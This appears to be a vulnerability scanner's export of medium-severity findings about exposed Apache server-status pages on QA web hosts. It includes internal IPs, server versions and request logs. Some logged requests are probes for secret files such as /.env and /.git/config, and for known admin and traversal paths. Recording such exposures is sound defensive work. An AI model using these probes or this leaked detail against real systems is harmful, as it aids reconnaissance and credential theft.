28-0188220/0/161_ 0.0076093710.00.001.69 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 29-0188230/0/109_ 0.0076038910.00.0027.36 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 30-0102430/45/145R 0.1969510755930.00.500.80 10.253.106.240http/1.1 31-0183101/1/57W 0.000012340.90.002.35 10.253.106.240http/1.1qa1-corporate.thermofisher.com:GET /.git/config HTTP/1.1 32-0167360/13/206R 0.0469416103050.00.163.18 10.253.106.240http/1.1 33-0183110/1/156W 0.000082790.00.004.50 10.253.106.240http/1.1qa1.onelambda.com:80GET /telescope/requests HTTP/1.1 34-0183122/2/91W 0.000046535.90.010.29 10.253.106.240http/1.1qa1.onelambda.com:80GET /.DS_Store HTTP/1.1 35-0175721/1/128K 0.00725124291.90.004.55 10.253.106.227http/1.1www.qa.thermofisher.com:80HEAD /onelambda/us/en/home.html HTTP/1.1 36-0147040/10/138R 0.023871446550.00.103.79 10.253.106.227http/1.1 37-0167372/3/31K 0.008057514719.80.170.31 10.253.106.227http/1.1qa1.thermofisher.in:80GET /Akamai/sureroute-test-object.html HTTP/1.1 38-0167380/3/138R 0.006922016311170.00.070.51 10.253.106.227http/1.1 39-088470/236/271R 0.516922087296500.01.242.70 10.253.106.227http/1.1 40-0188240/0/85_ 0.0076035960.00.000.91 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 41-0188250/0/109_ 0.0076057820.00.005.87 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 42-0183130/1/121W 0.000065750.00.000.53 10.253.106.240http/1.1qa1.onelambda.com:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 43-0167400/2/78R 0.0069512529050.00.011.23 10.253.106.240http/1.1 44-0188260/0/88_ 0.0076039510.00.000.50 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 45-0188270/0/46_ 0.007607960.00.000.20 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 46-0183151/1/96K 0.002031747325.00.003.57 10.253.106.240http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/libs/granite/csrf/token.json HTTP/1.1 47-0147050/1/117R 0.00692202981590.00.0148.81 10.253.106.227http/1.1 48-0183160/1/175W 0.000072050.00.013.89 10.253.106.240http/1.1qa1.unitylabservices.com:80GET /s/32332e33362e3136322e3730/_/;/META-INF/maven/com.atlassia 49-0120330/39/166R 0.076922017112940.00.260.96 10.253.106.240http/1.1 50-0183170/0/41W 0.000014650.00.000.34 10.253.106.240http/1.1qa1.onelambda.com:80GET /.env HTTP/1.1 51-0188280/0/156_ 0.0076063550.00.000.34 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS *
The server-status page (usually /server-status) allows server administrators to find out how well their server is performing.
This is a HTML page that gives the current server statistics such as the server version, up time,cpu, ram, and information about requests made to the server.
This information can be very useful if the application is sent sensitive information as GET requests. If you monitor this page you might be able to find CSRF tokens, API keys, hidden paths, and other sensitive information being sent to the server.
https://medium.com/@ghostlulzhacks/apache-server-status-a70abed83f5a
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e312879ce312879c8c3831d6
Apache Status Apache Server Status for qa1.prioritysolutions.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Tuesday, 02-Jul-2024 09:40:21 EDT Restart Time: Friday, 21-Jun-2024 10:03:23 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 10 days 23 hours 36 minutes 58 seconds Server load: 0.03 0.04 0.00 Total accesses: 607231 - Total Traffic: 12.1 GB - Total Duration: 131913261 CPU Usage: u81.28 s232.87 cu904.55 cs574.23 - .189% CPU load .64 requests/sec - 13.3 kB/second - 20.9 kB/request - 217.237 ms/request 38 requests currently being processed, 33 idle workers __KKKKKKRK_K__RK_R_KK__KK_K__.K_R__K.._K___W_._K_KK_.R..K..K_... R..R......_R.__.R.__.R_R.._._KKK_..............K................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-044890/91/5796_ 0.25691313255090.01.35273.19 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 1-038160/137/5647_ 0.31291118600690.00.46218.68 10.253.106.168http/1.1 2-0148841/1/5439K 0.002591419406992.10.00113.69 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 3-02243529366/94902/94902K 100.4571100264174115.1170.03170.03 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 4-0449045/102/5122K 0.292691211404482944.93.17158.46 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 5-02243729366/94902/94902K 106.1840100591174130.8170.05170.05 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 6-093272/251/5261K 0.612321112082184.95.59155.42 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 7-032695/119/5820K 0.2825513161914619.30.58250.32 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 8-0166580/153/5541R 0.494051411192230.01.75106.52 10.253.106.191http/1.1 9-038208/77/5381K 0.21212105177432.30.3073.32 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 10-044910/149/5134_ 0.431601214363960.00.88100.28 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 11-0138526/14/4698K 0.03261286397714.60.0473.78 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 12-044960/102/5145_ 0.45881716557290.00.6887.27 10.253.106.191http/1.1 13-044970/74/5609_ 0.29191214313030.00.45118.79 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 14-032730/150/5532R 0.435391213650490.01.62104.09 10.253.106.191http/1.1 15-032746/166/5494K 0.3916145160460.10.50201.14 10.253.106.168http/1.1qa1.allergyinsider.com:80GET / HTTP/1.1 16-044980/68/5120_ 0.29241312609660.00.50147.56 10.253.106.168http/1.1 17-045070/105/5284R 0.305721314207600.01.3065.35 10.253.106.191http/1.1 18-012720/333/5067_ 1.101401212500850.05.3766.29 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 19-0460511/95/5463K 0.2827912127280026.70.54269.49 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 20-0138557/7/4892K 0.025411144993556.00.0567.57 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/diagnostics/vendor/mapplic.min.css HTTP/1.1 21-032760/143/5832_ 0.3716139604880.00.60159.97 10.253.106.191http/1.1 22-0162940/37/5021_ 0.092551312568810.00.13366.11 10.253.106.191http/1.1 23-038224/64/4773K 0.1999108870429.30.3680.01 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 24-0149011/1/4959K 0.002591313220522.10.00229.51 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 25-0146290/134/5442_ 0.45734311918370.01.45146.91 10.253.106.168http/1.1 26-048793/64/4897K 0.191210123602610.30.35102.00 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 27-080820/234/4858_ 0.65411513435420.03.75141.84 10.253.106.191http/1.1 28-062870/75/4657_ 0.171541311895320.00.25193.68 10.253.106.168http/1.1 29-0-0/0/4877. 0.001421011070700.00.00120.47 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 30-01698517/163/4932K 0.495425842602192.91.03172.71 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/diagnostics/vendor/mapplic.min.js HTTP/1.1 31-0138560/39/4802_ 0.112361214290650.00.21215.19 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 32-038230/105/4653R 0.223731114369630.00.35234.62 10.253.106.168http/1.1 33-032830/117/4812_ 0.4526809071710.00.8366.74 10.253.106.168http/1.1www.qa.thermofisher.com:80GET /etc.clientlibs/diagnostics/components/content/multiselect/ 34-0202140/95/5026_ 0.262681211043680.00.33123.47 10.253.106.168http/1.1 35-0717433/122/4911K 0.32162151015150249.60.47111.15 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 36-0-0/0/5211. 0.00504009876150.00.00231.18 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 37-0-0/0/5124. 0.004572010570890.00.00133.99 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 38-0171470/98/4331_ 0.22230117395750.00.60217.90 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 39-066407/318/4849K 0.8324112131793217.01.01212.91 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 40-085560/107/4614_ 0.24252137540700.00.43262.04 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 41-0149580/139/5044_ 0.39130138557350.00.62121.47 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 42-0171480/123/5373_ 0.402401012211370.00.60328.08 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 43-0328421/73/4769W 0.230094734998.00.8180.20 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /server-status HTTP/1.1 44-087690/62/4773_ 0.17133129055110.00.2893.96 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 45-0-0/0/4587. 0.005041015283970.00.00280.97 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 46-0173820/94/4823_ 0.2599312903920.00.40161.43 10.253.106.168http/1.1 47-038255/106/4441K 0.287313150437612.10.9772.25 10.253.106.191http/1.1qa1.alle
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e312879ce312879c569edc8b
Apache Status Apache Server Status for qa1.prioritysolutions.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Saturday, 29-Jun-2024 19:51:04 EDT Restart Time: Friday, 21-Jun-2024 10:03:23 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 8 days 9 hours 47 minutes 41 seconds Server load: 0.01 0.06 0.05 Total accesses: 492208 - Total Traffic: 10.8 GB - Total Duration: 124884432 CPU Usage: u50.47 s171.35 cu776 cs481.29 - .204% CPU load .678 requests/sec - 15.6 kB/second - 23.0 kB/request - 253.723 ms/request 30 requests currently being processed, 30 idle workers RRRK_K_R_K_WRRRRRK___RK____RRRR_K_RRR_____K___...._.__R..R_.RR.. ..R....._.....___......................._....................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0178920/0/4809R 0.00556012346690.00.00264.00 10.253.106.168http/1.1 1-0137740/2/4627R 0.0076608038720.00.08199.18 10.253.106.191http/1.1 2-0143380/3/4505R 0.0176670815915120.00.0293.28 10.253.106.191http/1.1 3-0224357110/72646/72646K 77.979078939133209.0130.09130.09 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 4-0160200/0/4181_ 0.00109010781110.00.0099.24 10.253.106.168http/1.1 5-0224377110/72646/72646K 82.177179793133221.3130.10130.10 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 6-0129060/5/4285_ 0.0130823711366310.00.31136.85 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /content/diagnostics/onelambda/global/en/support/rss-feed.h 7-064210/10/4770R 0.03767015545160.01.38240.82 10.253.106.191http/1.1 8-064220/40/4565_ 0.11262110485500.02.3990.83 10.253.106.191http/1.1 9-0137803/3/4414K 0.002223796739041.80.0447.19 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /content/diagnostics/onelambda/global/en/support/rss-feed.h 10-0141270/0/4069_ 0.00311013765590.00.0085.35 10.253.106.168http/1.1 11-064249/37/3585W 0.140078887015.41.1959.86 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /server-status HTTP/1.1 12-038670/19/4350R 0.04461116054550.02.2279.86 10.253.106.191http/1.1 13-0132180/4/4907R 0.025671513690980.00.04113.28 10.253.106.168http/1.1 14-0129090/3/4483R 0.0147430412704820.00.0986.39 10.253.106.168http/1.1 15-0182720/0/4443R 0.00555013764440.00.00191.15 10.253.106.168http/1.1 16-0132190/2/4295R 0.0067426011756510.00.0981.56 10.253.106.191http/1.1 17-0137936/6/4363K 0.0225135219939.40.0457.02 10.253.106.191http/1.1qa1.allergyinsider.com:80GET / HTTP/1.1 18-0160210/0/4065_ 0.0087011685790.00.0054.45 10.253.106.168http/1.1 19-0160220/0/4652_ 0.0092012043520.00.00261.05 10.253.106.168http/1.1 20-0102680/2/4197_ 0.00253013969470.00.0162.54 10.253.106.191http/1.1 21-0129110/0/4818R 0.0047508955440.00.00147.25 10.253.106.168http/1.1 22-0182732/2/4264K 0.0011240119015116.90.02355.03 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /content/diagnostics/onelambda/global/en/support/rss-feed.h 23-0143470/0/3951_ 0.001408028550.00.0071.43 10.253.106.168http/1.1 24-0103380/25/4038_ 0.0653611264270.00.20221.10 10.253.106.168http/1.1 25-0103390/4/4569_ 0.00252011116190.00.0184.90 10.253.106.191http/1.1 26-0294880/0/4032_ 0.001011677650.00.0085.62 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 27-093530/2/3985R 0.00695112657700.00.01128.43 10.253.106.191http/1.1 28-0292170/0/3910R 0.00410010586210.00.00183.22 10.253.106.191http/1.1 29-0292210/0/4315R 0.00396010547010.00.00116.30 10.253.106.191http/1.1 30-0138020/0/3858R 0.0076707309470.00.00140.61 10.253.106.168http/1.1 31-093570/18/3819_ 0.0623551512380760.02.50121.46 10.253.106.191http/1.1 32-0138032/4/3999K 0.001384713213417.70.01226.46 10.253.106.191http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/api/aem-datahub/api/allergen_fact_she 33-0129130/3/3968_ 0.00352438528170.00.0156.80 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 34-0138040/5/4003R 0.017661379712660.00.5491.09 10.253.106.191http/1.1 35-0292240/0/3912R 0.0039109235820.00.0054.60 10.253.106.191http/1.1 36-0292360/0/4175R 0.0035709175570.00.00218.17 10.253.106.191http/1.1 37-087370/6/4457_ 0.0114429957390.00.27127.29 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 38-0129140/19/3632_ 0.03352147002450.03.73210.19 10.253.106.191http/1.1 39-0141560/0/4005_ 0.00311012460430.00.00205.54 10.253.106.168http/1.1 40-0294890/0/3665_ 0.00006837330.00.00254.17 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 41-0294900/0/4249_ 0.00007909400.00.00112.31 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 42-0138061/4/4570K 0.0013957810362212.20.01319.70 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 43-0103440/20/3801_ 0.0710708712030.00.5367.06 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /content/dam/diagnostics/components/structure/icons/favicon 44-0141570/0/3752_ 0.0030808433670.00.0087.23 10.253.106.168http/1.1 45-0129170/9/3970_ 0.012535314651480.00.09273.82 10.253.106.191http/1.1 46-0-0/0/3912. 0.001075012246360.00.00152.17 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 47-0-0/0/3521. 0.00671014381260.00.0065.81 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 48-0-0/0/3696. 0.00114406883260.00.00161.38 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 49-0-0/0/3892. 0.001223010225000.00.0039.43 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 50-0129190/2/3628_ 0.0035298819250.00.08114.75 10.253.106.191http/1.1 51-0-0/0/4110. 0.001277013923990.00.0078.54 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 52-0129200/0/3692_ 0.00339011091680.00.0064.18 10.253.106.168http/1.1 53-0129210/11/3687_ 0.031061313635080.00.0393.39 10.253.106.168http/1.1</
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e312879ce312879c9fc4586f
Apache Status Apache Server Status for qa1.prioritysolutions.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Thursday, 27-Jun-2024 21:42:09 EDT Restart Time: Friday, 21-Jun-2024 10:03:23 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 6 days 11 hours 38 minutes 45 seconds Server load: 0.00 0.00 0.00 Total accesses: 385248 - Total Traffic: 9.3 GB - Total Duration: 114990939 CPU Usage: u39.91 s123.52 cu643.96 cs375.46 - .211% CPU load .688 requests/sec - 17.4 kB/second - 25.3 kB/request - 298.485 ms/request 27 requests currently being processed, 30 idle workers K.RK_K..KR___.R_._R_RRR.R____._.R.R_R_R.R_.RR_RRW____R__._R__.RR ____.._.R....................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0235891/1/3840K 0.002761211653972.40.00195.91 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 1-0-0/0/3625. 0.0053107453000.00.00189.98 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 2-0174820/4/3454R 0.005564114927860.00.0084.40 10.253.106.168http/1.1 3-02243556033/56033/56033K 56.344056448102676.2100.27100.27 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 4-0175530/4/3199_ 0.02265469525390.00.0592.47 10.253.106.191http/1.1 5-02243756033/56033/56033K 58.371056366102685.6100.28100.28 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 6-0-0/0/3391. 0.00529010751910.00.00128.69 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 7-0-0/0/3727. 0.00555014799360.00.00229.00 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 8-0207002/2/3541K 0.0022159034242.20.0081.59 10.253.106.168http/1.1qa1.allergyinsider.com:80POST / HTTP/1.1 9-0215850/0/3190R 0.0048308615630.00.0038.53 10.253.106.168http/1.1 10-0215860/5/3360_ 0.002841413123000.00.0281.61 10.253.106.191http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 11-0207020/1/2737_ 0.00223147188250.00.2149.70 10.253.106.168http/1.1 12-019850/42/3329_ 0.10330014147310.00.2066.53 10.253.106.168http/1.1 13-0-0/0/3880. 0.00551013162060.00.0074.47 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 14-0175550/13/3481R 0.035561212094440.00.0779.09 10.253.106.168http/1.1 15-0200950/26/3480_ 0.09425711749990.00.26181.90 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/diagnostics/components/structure/pct_footer 16-0-0/0/3448. 0.00553010858400.00.0074.59 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 17-0145480/122/3310_ 0.31601212237970.00.4150.42 10.253.106.191http/1.1 18-0235900/0/3202R 0.0055608176430.00.0047.97 10.253.106.168http/1.1 19-0219460/15/3868_ 0.1260810840880.00.20254.63 10.253.106.191http/1.1 20-0218980/0/3216R 0.00530010442090.00.0052.14 10.253.106.168http/1.1 21-0202010/4/3855R 0.0048208249910.00.02137.82 10.253.106.168http/1.1 22-0232790/0/3379R 0.00482011199580.00.00220.07 10.253.106.168http/1.1 23-0-0/0/2998. 0.0055007228940.00.0061.64 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 24-0215890/13/3189R 0.04556010734410.00.12213.97 10.253.106.191http/1.1 25-0232800/0/3480_ 0.00426010330050.00.0072.87 10.253.106.191http/1.1 26-0230510/1/3044_ 0.006097050350.00.0066.75 10.253.106.191http/1.1 27-0216030/2/3170_ 0.00223911406220.00.00121.17 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 28-0232810/2/3351_ 0.001774310147830.00.0091.32 10.253.106.191http/1.1 29-0-0/0/3291. 0.0052809296060.00.00101.24 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 30-0202590/5/3110_ 0.016006568600.00.05132.66 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/allergy/clientlibs/vendor/js_cookie.min.js 31-0-0/0/3000. 0.00480010460650.00.00111.01 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 32-0235910/0/3045R 0.00556010110540.00.00218.40 10.253.106.191http/1.1 33-0-0/0/3308. 0.0055407898550.00.0047.32 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 34-0175590/17/3161R 0.1555679263520.00.6381.77 10.253.106.168http/1.1 35-0175600/4/3179_ 0.016038797790.00.0148.43 10.253.106.191http/1.1 36-0225530/1/3242R 0.005321737748370.00.07205.97 10.253.106.191http/1.1 37-0232930/0/3422_ 0.0039307436590.00.00118.83 10.253.106.168http/1.1 38-0235920/0/2866R 0.0055605897190.00.00198.94 10.253.106.191http/1.1 39-0-0/0/3201. 0.00530011625600.00.00193.85 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 40-0175640/2/2734R 0.00556526113840.00.01239.45 10.253.106.168http/1.1 41-0232970/2/3451_ 0.01177547191610.00.04105.40 10.253.106.168http/1.1 42-0-0/0/3274. 0.0042409612100.00.00155.12 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 43-0219990/0/3073R 0.0048307606580.00.0057.90 10.253.106.168http/1.1 44-0175670/2/2815R 0.0155677054910.00.0573.91 10.253.106.191http/1.1 45-0202610/3/2985_ 0.01178813784910.00.03251.24 10.253.106.168http/1.1 46-0220000/1/3072R 0.00482011610530.00.00125.23 10.253.106.168http/1.1 47-0200960/36/2913R 0.16483113853670.00.3758.36 10.253.106.168http/1.1 48-02359411/13/2970W 0.020058437019.50.02156.35 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /server-status HTTP/1.1 49-0239250/1/3150_ 0.0460589536310.00.0534.27 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc.clientlibs/allergy/clientlibs/clientlib-base.min.css H 50-0202630/0/2889_ 0.0022308224080.00.00105.07 10.253.106.168http/1.1 51-0239260/0/3370_ 0.00120013434690.00.0073.31 10.253.106.191http/1.1 52-0239290/0/3115_ 0.0061010671420.00.0052.96 10.253.106.168http/1.1 53-0224660/38/3073R 0.3455628510780280.00.5084.95 10.253.106.191http/1.1 54-0224670/32/2947_ 0.08</
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e312879ce312879c03b60cc4
Apache Status Apache Server Status for qa1.prioritysolutions.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Sunday, 23-Jun-2024 20:52:48 EDT Restart Time: Friday, 21-Jun-2024 10:03:23 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 2 days 10 hours 49 minutes 24 seconds Server load: 0.00 0.00 0.00 Total accesses: 102140 - Total Traffic: 2.2 GB - Total Duration: 12974532 CPU Usage: u22.74 s45.33 cu142.28 cs90.59 - .142% CPU load .482 requests/sec - 11.0 kB/second - 22.9 kB/request - 127.027 ms/request 38 requests currently being processed, 30 idle workers _R_K_KRRRR____RRR__R____R__K__K_KR__RR_K_R_RWRR_R_R_R__._..RRK_R ...R..RK...R...RR...R........................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-055000/11/970_ 0.01357111776610.00.0296.51 10.253.106.168http/1.1 1-061220/13/842R 0.0376486121283230.00.3113.74 10.253.106.191http/1.1 2-035940/26/752_ 0.07216144625940.00.0615.66 10.253.106.191http/1.1 3-02243521177/21177/21177K 19.65311927138667.337.7637.76 10.253.106.168http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 4-0160320/0/779_ 0.0014301201080.00.0022.41 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 5-02243721177/21177/21177K 20.15001870138670.837.7637.76 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 6-0306680/92/846R 0.31673121051850.01.6743.67 10.253.106.168http/1.1 7-0230590/54/858R 0.288044171394970.01.6821.69 10.253.106.168http/1.1 8-079160/6/606R 0.0273311632520.00.1521.89 10.253.106.191http/1.1 9-086060/50/791R 0.1370610972960.00.6011.05 10.253.106.191http/1.1 10-0224620/99/732_ 0.45122122677210.01.2010.59 10.253.106.191http/1.1 11-0224880/23/762_ 0.05154133047150.00.0518.86 10.253.106.191http/1.1 12-022400/188/910_ 0.5120103030760.01.4116.32 10.253.106.168http/1.1 13-0230600/39/1051_ 0.1029348602090880.00.3221.47 10.253.106.168http/1.1 14-0101070/35/829R 0.12768112649310.01.0043.92 10.253.106.168http/1.1 15-031460/147/675R 0.374257754840.01.4910.35 10.253.106.168http/1.1 16-0226930/39/1103R 0.115988712130830.00.5729.27 10.253.106.191http/1.1 17-0160330/0/780_ 0.0014202688880.00.0014.43 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 18-0101080/2/773_ 0.002423211916480.00.0210.74 10.253.106.191http/1.1 19-0230610/35/960R 0.21401111790830.00.77171.72 10.253.106.191http/1.1 20-0160340/0/773_ 0.001420880360.00.009.82 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 21-0160350/0/938_ 0.0012802889300.00.0036.04 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 22-0160430/0/956_ 0.0010901305070.00.00103.91 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 23-0160480/0/657_ 0.001040939900.00.0012.69 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 24-0226980/37/898R 0.13774161498840.00.27175.74 10.253.106.168http/1.1 25-0160560/0/750_ 0.009002581370.00.0013.77 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 26-058900/43/749_ 0.10122122118010.00.499.01 10.253.106.191http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 27-03268718/154/662K 0.791112997121045.72.4915.57 10.253.106.191http/1.1qa1.thermofisher.in:80GET 